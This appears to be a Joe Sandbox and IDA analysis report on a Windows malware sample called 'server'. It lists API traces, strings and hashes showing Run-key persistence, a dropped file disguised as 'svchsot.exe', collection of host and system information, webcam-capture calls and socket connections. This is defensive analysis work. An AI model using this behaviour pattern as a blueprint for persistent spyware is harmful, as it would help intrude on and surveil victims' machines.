Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: FileResourcelstrcat$DirectoryFindSleepwsprintf$??2@??3@CopyCreateLoadLockMessageModuleMoveNamePostWindowWindowslstrlen
String ID: %s\JH.BAT$LLLLLL$Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$XXXXXX$\svchsot.exe
API String ID: 426448433-1350257756
Opcode ID: 6d98c662a98864542062ff972e89dce42718af20c829256efac473ef5170f2d3
Instruction ID: 7e78db92d01b1022693add636c3c748d173f9461a296e18299dfe13d1dc5dce8
Opcode Fuzzy Hash: 6d98c662a98864542062ff972e89dce42718af20c829256efac473ef5170f2d3
Instruction Fuzzy Hash: A531A472144395BBE310DBA4CC85FEB73A9EBC8700F004D1CF38496080EBB9A548CBA6

Function 10001380 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 104
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784

wsprintfA.USER32 ref: 100013C0
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492

Strings

GGGGGG, xrefs: 1000138F
XXXXXX, xrefs: 100013CC

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Resource$File$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWritewsprintf
String ID: GGGGGG$XXXXXX
API String ID: 3303837233-960986945
Opcode ID: cc1146a021282efb5b2e256a42fc67f220187294097d6b15d6d16da5d321ef9b
Instruction ID: ac7a2d40f97e3ef275d1792f4a74c8e88388e2e8796807a1ab99ef5296ea06a1
Opcode Fuzzy Hash: cc1146a021282efb5b2e256a42fc67f220187294097d6b15d6d16da5d321ef9b
Instruction Fuzzy Hash: 9431C7766006046BE318CBB4CC56BEB779AEBC4360F144B2DF667972C1DEE49D088295

Function 10001600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32 ref: 10001624

Part of subcall function 100012E0: wsprintfA.USER32 ref: 1000132A
Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001356
Part of subcall function 100012E0: gethostname.WS2_32(?,?), ref: 1000135E
Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001365

getsockname.WS2_32 ref: 10001679

Part of subcall function 10001240: RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
Part of subcall function 10001240: RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,76F90F00,00000000), ref: 10001280
Part of subcall function 10001240: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,76F90F00,00000000), ref: 1000128B

GetSystemInfo.KERNEL32(?), ref: 100016B0

Part of subcall function 100012A0: 6CC61E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE

GlobalMemoryStatus.KERNEL32 ref: 100016E8

Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784

Part of subcall function 100014B0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
Part of subcall function 100014B0: FindFirstFileA.KERNEL32(?,?), ref: 10001546
Part of subcall function 100014B0: CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
Part of subcall function 100014B0: ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015B5
Part of subcall function 100014B0: CloseHandle.KERNEL32(00000000), ref: 100015BB
Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015CA

Part of subcall function 10003E30: _ftol.MSVCRT ref: 10003E6F
Part of subcall function 10003E30: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79

Strings

, xrefs: 100016E0
VVVVVV, xrefs: 100016FA
f, xrefs: 1000160F

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: FileResourcewsprintf$??2@CloseFindSystemlstrlen$??3@CreateDirectoryFirstGlobalHandleInfoLoadLockMemoryOpenQueryReadStatusValueVersion_ftolgethostnamegetsockname
String ID: $VVVVVV$f
API String ID: 965855644-510421235
Opcode ID: 64974564b339baab4ba4e779f8b5793599d933840332e7d8fd09318f2be7bc69
Instruction ID: 195f56337f309cec53029e41885cee457b9433af063c58e809775b1897ec5c08
Opcode Fuzzy Hash: 64974564b339baab4ba4e779f8b5793599d933840332e7d8fd09318f2be7bc69
Instruction Fuzzy Hash: 9D3170B55083859FD324CF24C885ADBBBE5FBC8344F008A1DF58983241DB74AA49CBA2

Function 1000DDA0 Relevance: 12.1, APIs: 8, Instructions: 133
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNEL32(?,00000001,00000000,00000000,00000000,000F003F,00000000,753C8400,753C8400,753C8400,00000000,76F88A60,?,00000000,00000001,?), ref: 1000DDF7
RegOpenKeyExA.KERNEL32(0002001F,00000000,00000000,0002001F,?), ref: 1000DE17
RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000DE4D
RegSetValueExA.KERNEL32(?,00000000,00000000,?,?), ref: 1000DE7A
RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000DE98
RegDeleteKeyA.ADVAPI32(?,?), ref: 1000DEAA
RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000DEC8
RegDeleteValueA.ADVAPI32(?,?), ref: 1000DEDA

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: OpenValue$Delete$Create
String ID:
API String ID: 2295199933-0
Opcode ID: dfa9c450c80950de0395e4e7346e7bf10f91bfe681af39af305210a63dd43573
Instruction ID: 67a97fe157c163e159881c9215a6b69e3a943ce5662b6e6d27993ba540d2685e
Opcode Fuzzy Hash: dfa9c450c80950de0395e4e7346e7bf10f91bfe681af39af305210a63dd43573
Instruction Fuzzy Hash: FA415DB1600289ABEB10EF95CD84EAFB7BDFB58790B10851AFA19D7184D771ED008B70

Function 10003940 Relevance: 10.6, APIs: 7, Instructions: 97
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10

ResetEvent.KERNEL32(?,76F923A0,00000000,?,?,?,?,?,10002644,?,?), ref: 10003953
socket.WS2_32 ref: 10003966
gethostbyname.WS2_32(?), ref: 10003986

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Event$CancelExchangeInterlockedResetclosesocketgethostbynamesetsockoptsocket
String ID:
API String ID: 513860241-0
Opcode ID: f5d5e40a01575f7ff4510ad924051b1898b7209a945d550d58589024808b7694
Instruction ID: 7f2db06767454f243879fc9fac78131effb9a87e5068b181b0692220e83332b6
Opcode Fuzzy Hash: f5d5e40a01575f7ff4510ad924051b1898b7209a945d550d58589024808b7694
Instruction Fuzzy Hash: 9531A375204351BFE320DF68CC85F9BB7E9AF85754F00850DF1999B290DBB198498752

Function 10012620 Relevance: 10.6, APIs: 7, Instructions: 53
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
Process32First.KERNEL32(00000000,00000000), ref: 10012646
_strcmpi.MSVCRT ref: 10012658
Process32Next.KERNEL32(00000000,00000000), ref: 1001266F
lstrcmpiA.KERNEL32(00000024,?), ref: 1001267A
Process32Next.KERNEL32(00000000,00000000), ref: 10012686

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Process32$Next$??2@CreateFirstSnapshotToolhelp32_strcmpilstrcmpi
String ID:
API String ID: 3655294272-0
Opcode ID: 67c08678b8a741a8853cf96a4596b8c1c3ecd4c282c82cf466cdddd3c9690391
Instruction ID: 7b96640b3de945d751338f4a492b60aca70c41a0bc2120e114b52792a7ac63ae
Opcode Fuzzy Hash: 67c08678b8a741a8853cf96a4596b8c1c3ecd4c282c82cf466cdddd3c9690391
Instruction Fuzzy Hash: B9F0A4B130135627E6109676AC45EA77BDDCF826E6F011425FA04E9081FB31E96092B5

Function 100012E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 1000132A

Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C

lstrlen.KERNEL32(?), ref: 10001356
gethostname.WS2_32(?,?), ref: 1000135E
lstrlen.KERNEL32(?), ref: 10001365

Strings

Host, xrefs: 1000133C
SYSTEM\CurrentControlSet\Services\%s, xrefs: 10001324

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: lstrlen$Opengethostnamewsprintf
String ID: Host$SYSTEM\CurrentControlSet\Services\%s
API String ID: 2381335061-3973614608
Opcode ID: 92b43f06b2ba5dd0f53fd441dc8e5a695e761c9028b70946e1b6b411c71be7b7
Instruction ID: 00a212d8d59931bd4f36ea5daea73ab107ff809958005370ca5a53895ebf1fbb
Opcode Fuzzy Hash: 92b43f06b2ba5dd0f53fd441dc8e5a695e761c9028b70946e1b6b411c71be7b7
Instruction Fuzzy Hash: 2D01F7712003547FF7209224CC55FEB729EEFC8754F008828F74593240D6B56D4586A6

Function 10003780 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100033D0: RtlInitializeCriticalSection.NTDLL(?), ref: 100033E8

WSAStartup.WS2_32(00000202,?), ref: 100037ED
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100037FB

Strings

s, xrefs: 10003810
h, xrefs: 10003806
0, xrefs: 1000380B
G, xrefs: 10003801

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateCriticalEventInitializeSectionStartup
String ID: 0$G$h$s
API String ID: 1327880603-311548548
Opcode ID: 21ddecf2d21aa6d545d3b10116af13633dc4fe99f0d64337955797704fc22f9f
Instruction ID: 055722d880a944932a15ed8300a47e19ec8ef09bbf59dd5dab02bd7fde056146
Opcode Fuzzy Hash: 21ddecf2d21aa6d545d3b10116af13633dc4fe99f0d64337955797704fc22f9f
Instruction Fuzzy Hash: 81216D342097C09EE325CB28C945B87BBD9EB96B14F04895DE4EA472C1CBB96509CB63

Function 10009720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
LoadResource.KERNEL32(?,00000000), ref: 10009751
LockResource.KERNEL32(00000000), ref: 10009758
??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784

Strings

HOST, xrefs: 1000973F

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Resource$??2@??3@FindLoadLock
String ID: HOST
API String ID: 472997506-4189257289
Opcode ID: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
Instruction ID: d48a8112f6b242a354970dd34bc60e7fd0122bfa4f1a00ce6be9372c3ccc99b8
Opcode Fuzzy Hash: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
Instruction Fuzzy Hash: 03F0F6F37002102BF600DAB89CCAFAB228DDB85379F040434F704DB281DA659C505262

Function 10001240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,76F90F00,00000000), ref: 10001280
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,76F90F00,00000000), ref: 1000128B

Strings

~MHz, xrefs: 1000127A
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 10001255

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
API String ID: 3677997916-2226868861
Opcode ID: 38e8219e42e4db55c2fa6dfb5570c5b58118580aa776850d210d057bb2b41c5a
Instruction ID: 35c208d4d3540590a10e284a9e24e56e80ebe8266937a50f360b862ca68792b9
Opcode Fuzzy Hash: 38e8219e42e4db55c2fa6dfb5570c5b58118580aa776850d210d057bb2b41c5a
Instruction Fuzzy Hash: 10F0F2B8508345BFE300DB64CD88E6BB7E9EBC8708F00CD0CF68982210E674E958CB56

Function 00401360 Relevance: 6.1, APIs: 4, Instructions: 106libraryloaderCOMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(00025AE0,00000014), ref: 0040138E
LoadLibraryA.KERNEL32(?), ref: 004013AA
GetProcAddress.KERNEL32(00000000,?), ref: 00401418
IsBadReadPtr.KERNEL32(?,00000014), ref: 0040143F

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: Read$AddressLibraryLoadProc
String ID:
API String ID: 2438460464-0
Opcode ID: 27ececaa12b5b765cc8e63b84323d5f545e4a42f36feeac29bab8f0b659a3445
Instruction ID: 0e99147658626de8a4eabd926d73d9b79b83d8c6d3faf898b778abdf7a68cf47
Opcode Fuzzy Hash: 27ececaa12b5b765cc8e63b84323d5f545e4a42f36feeac29bab8f0b659a3445
Instruction Fuzzy Hash: 4631A6727002069BD720CF29DC40A17F7A4FF84364B16453AE91AE77B1E739E815DB94

Function 00401A39 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 00401A5F

Part of subcall function 00402F1C: HeapCreate.KERNEL32(00000000,00001000,00000000,00401A98,00000000), ref: 00402F2D
Part of subcall function 00402F1C: HeapDestroy.KERNEL32 ref: 00402F6C

GetCommandLineA.KERNEL32 ref: 00401AAD
GetStartupInfoA.KERNEL32(?), ref: 00401AD8
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401AFB

Part of subcall function 00401B54: ExitProcess.KERNEL32 ref: 00401B71

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID:
API String ID: 2057626494-0
Opcode ID: dc65ff5252418ed06f7e2aeaecfc8b6d2eb23304b692f99c21b4a53cfaee9d22
Instruction ID: b213e8132dc8efbe91fcc638b7e301980758df8d45bd4a2f5fe3e08e305f8fc9
Opcode Fuzzy Hash: dc65ff5252418ed06f7e2aeaecfc8b6d2eb23304b692f99c21b4a53cfaee9d22
Instruction Fuzzy Hash: C3219CB0A40615AEDB18EFA6DD49A6E7BB8EF04704F10403FF902B72E1DB788501CB58

Function 100035A0 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

ceil.MSVCRT ref: 100035DC
_ftol.MSVCRT ref: 100035E5
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,?,?,?,?,?,?,?,?,?,00000118), ref: 100035F9

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: AllocVirtual_ftolceil
String ID:
API String ID: 3317677364-0
Opcode ID: b9b9c7f959cafb60f8c472a1f707b4b1b0d8421ec6f82b85174b074a243b1b02
Instruction ID: 0b1270368d2d45482b5d2b14c9809ff80a02e72387afd42c370cd588329eedd8
Opcode Fuzzy Hash: b9b9c7f959cafb60f8c472a1f707b4b1b0d8421ec6f82b85174b074a243b1b02
Instruction Fuzzy Hash: 8E11D2756043049BE704DF28AC8571BBBE5EBC4762F00C43EFD498B395EA76D808CA65

Function 10003670 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

ceil.MSVCRT ref: 100036AA
_ftol.MSVCRT ref: 100036B3

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: _ftolceil
String ID:
API String ID: 2006273141-0
Opcode ID: df6a29d0820029fa79311222890b0ba528136a89e509867819a9108e4dc1c471
Instruction ID: f036b2167112de69efae3a2f3866b39feb2a68a965f290d79b5dff6310f46f10
Opcode Fuzzy Hash: df6a29d0820029fa79311222890b0ba528136a89e509867819a9108e4dc1c471
Instruction Fuzzy Hash: 7411B4717043049FE700EF24EC8562BBBD5EB84752F00C83EFD458B385EA769818CA65

Function 100126A0 Relevance: 6.0, APIs: 4, Instructions: 39synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000002,00000001,00000006,?,?,?,?,?,10002644,?), ref: 100126C4
_beginthreadex.MSVCRT ref: 100126EC
WaitForSingleObject.KERNEL32(?,000000FF), ref: 100126FE
CloseHandle.KERNEL32(?), ref: 10012709

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
